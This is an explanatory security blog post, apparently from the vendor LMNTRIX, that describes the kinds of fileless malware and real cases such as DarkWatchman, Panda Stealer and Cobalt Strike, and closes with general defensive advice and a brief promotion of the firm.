Fileless malware often also referred to as a malware-less attack, can be seen as any attack that uses native, legitimate tools built into a system to execute a cyber attack. In practice this means that the attacker does not need to install any malicious code onto the compromised machine, making detection a far harder prospect. Further, it also complicates analysis making any such an attack far harder to defend against, especially for traditional antivirus products that rely on detecting signatures left by malware installs or detecting the malware itself.
Back in 2015, security researchers were detecting these types of attacks but they were incredibly rare and were the sole domain of Chinese state-sponsored groups furthering the Chinese government’s geopolitical aims. As is often the case, the work of nation-state threat actors soon gets emulated by more financially minded hackers with little to no affiliation or loyalty to a state institution. Recent research suggests that instances of these attacks increased by some 70% in 2022 over the previous year. The trend in increased detections is clearly on the rise as detections were up 62% in 2021. These increases have been attributed to the increased adoption of fileless tactics by financially motivated threat actors and groups.
Types of Fileless Malware Attacks
Fileless malware has become a fairly broad catch-all term for several specific attacks. These include:
Exploit kits
Hijacked native tools
Registry resident malware
Memory-only malware
Fileless ransomware
Stolen credentials
It is important to take a look at each in turn, briefly.
Exploit Kits
These had their heyday when Internet Explorer and Adobe’s Flash Player were turning out security vulnerabilities like they were going out of fashion. Threat actors were developing kits that would look to exploit several publicly disclosed vulnerabilities; this was done by either pieces of code, sequences of commands, or even in some instances collections of data. Exploit kits can be fileless in the sense that they are loaded to and initialized from memory rather than the installation of malware files. This also allows threat actors the ability to automate infection chains and scale attacks accordingly depending on the size of the target.
Hijacked Local Tools
Another popular form of fileless malware is the abuse of legitimate tools and applications. One way to do this is by sending instructions via the command line of a computer. This has proved a good way to evade detection as traditional antivirus packages do not monitor command-line interactions. Further, zero-day vulnerabilities in popular applications can be leveraged to carry out fileless attacks by executing the attack from within memory.
Registry Resident Malware
At its most fundamental this is malware that installs itself within the Windows Registry, a core part of the operating system. This has the added benefit of helping to avoid detection but remains persistent on the machine even after the system is restarted for whatever reason.
This is commonly done via the use of a malware dropper. In practice, Windows systems are infected through the use of a program that downloads a malicious file, known as the dropper. If this malicious file remains active on the target system, it is vulnerable to detection by antivirus software. This is typically how malware infects Windows machines. To circumvent detection, the file is loaded in the registry. Fileless malware may also use a dropper program, but it doesn’t download a malicious file. Instead, the dropper program itself writes malicious code straight into the Windows registry.
The malicious code can be programmed to launch every time the OS is launched, and there is no malicious file that could be discovered, the malicious code is hidden in native files which are not subject to antivirus software detection.
Memory Only Malware
As the name suggests this is malware that resides in memory only. In order to do this successfully, the malware needs to abuse legitimate tools to execute and remain persistent. Trusted tools like Windows PowerShell, VB Scripts, and Windows Management Instrumentation. Once initial access is secured these tools and the malware hidden within random access memory (RAM) have been seen to gain increased privileges, backdoor compromised machines, and spread laterally to compromise linked machines on the target network.
Fileless Ransomware
Recently, ransomware threat actors are using fileless techniques to embed malicious code in documents through the use of native scripting languages such as macros or to write the malicious code directly into memory through the use of an exploit. The ransomware then hijacks native tools like PowerShell to encrypt hostage files, all without ever having written a single line to disk. Microsoft has responded to this threat in particular by disabling macros by default on several of its products but end users should not feel too secure as threat actors are known for developing cunning plans.
Stolen Credentials
While this is not strictly a fileless attack, security researchers have noted how stolen credentials have been used to start such an attack. This is done by accessing legitimate tools as a privileged user. For example, tools such as Windows Management Instrumentation (WMI) or PowerShell are used to execute commands that enable the attack and load malware to memory. Alternatively, they can establish persistence by hiding code in the registry or the kernel, or by creating user accounts that grant them access to any system they choose.
Real World Examples
Unfortunately, this is not solely the realm of theory and several real-world fileless attacks deserve to be mentioned.
Dark Watchman
This rather nasty Remote Access Trojan (RAT) hides in the Windows Registry and is a lightweight and highly-capable JavaScript RAT paired with a C# keylogger. The keylogger aspect utilizes the Windows Registry fileless storage mechanism to maintain persistence and in true fileless malware form the malware is not written to disk but rather a scheduled task is created to launch the DarkWatchmanonce a user logs in. Despite the malware’s lightweight, it is fully featured, with those features including the following capabilities:
- Execute EXE files (with or without the output returned)
- Load DLL files
- Execute commands on the command line
- Execute WSH commands
- Execute miscellaneous commands via WMI
- Execute PowerShell commands
- Evaluate JavaScript
- Upload files to the C2 server from the victim machine
- Remotely stop and uninstall the RAT and Keylogger
- Remotely update the C2 server address or call-home timeout
- Update the RAT and Keylogger remotely
- Set an autostart JavaScript to run on the RAT startup
- A Domain Generation Algorithm (DGA) for C2 resiliency
- If the user has admin permissions, it deletes shadow copies using vssadmin.exe
Panda Stealer
In 2021, Panda Stealer was discovered with an interesting infection chain that deserves special mention. The malware is initially deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files, a fairly typical infection chain so far. Then the interesting part begins, if the Excel file is opened an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative is enacted. This then accesses a second encrypted PowerShell command which imports a function. This function then loads a .NET assembly within memory from a paste.ee URL. The fileless payload is obfuscated and it replaces a legitimate MSBuild.exe process with the hex-coded Panda Stealer binary which is again retrieved from a different paste.ee URL.
All this is done to remain undetected. The malware itself can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, but it can also steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards. This is all done from memory with no malware being written to disk.
Cobalt Strike
Cobalt Strike, often makes the news headlines for helping facilitate ransomware infections. However, its uses can be far more nuanced and broad, and when used by a skilled threat actor the application can be used to deliver fileless malware payloads for memory to avoid detection. Along with other malware strains like Emotet, a banking trojan, also capable of fileless infections that will steal a victims financial information, it is clear threat actors are favoring the fileless approach.
It is important to remember that Cobalt Strike is a legitimate penetration testing tool that has been used by attackers to establish a foothold in networks. Sadly, over the years the legitimate penetration testing tool has developed a reputation for being a cyber criminal’s best friend.
These three malware strains show exactly the threat posed by threat actors adopting fileless malware tactics, also referred to sometimes as “living off the land”. The last question then is how does one defend against these attacks if they can easily beat signature detection-based security software?
Defending Against Fileless Malware
The real key to successfully defending against fileless attacks is an integrated approach that addresses the entire threat lifecycle. To do this a multi-layered defense is required. This approach allows the defender to gain an advantage over attackers by being able to investigate every phase of a campaign.
In this regard, two things are especially important:
- The ability to see and measure what’s happening: discovering the techniques used by the attack, monitoring activities in PowerShell or other scripting engines, accessing aggregated threat data, and gaining visibility into user activities.
- The ability to control the state of the targeted system: halting arbitrary processes, remediating processes that are part of the attack, and isolating infected devices.
This is by no means an easy task. Adopting more holistic approaches to cyber defense where threats are actively hunted requires a skilled team equipped with the right tools. At LMNTRIX, we understand that it is difficult to defend against these attacks but we also know that it can be done.
To conclude, we would like to add that fileless malware is a growing threat to businesses and individuals alike. Traditional antivirus software is not effective in detecting and removing fileless malware. By taking proactive steps to prevent these attacks from occurring, you can reduce the risk of falling victim to fileless malware.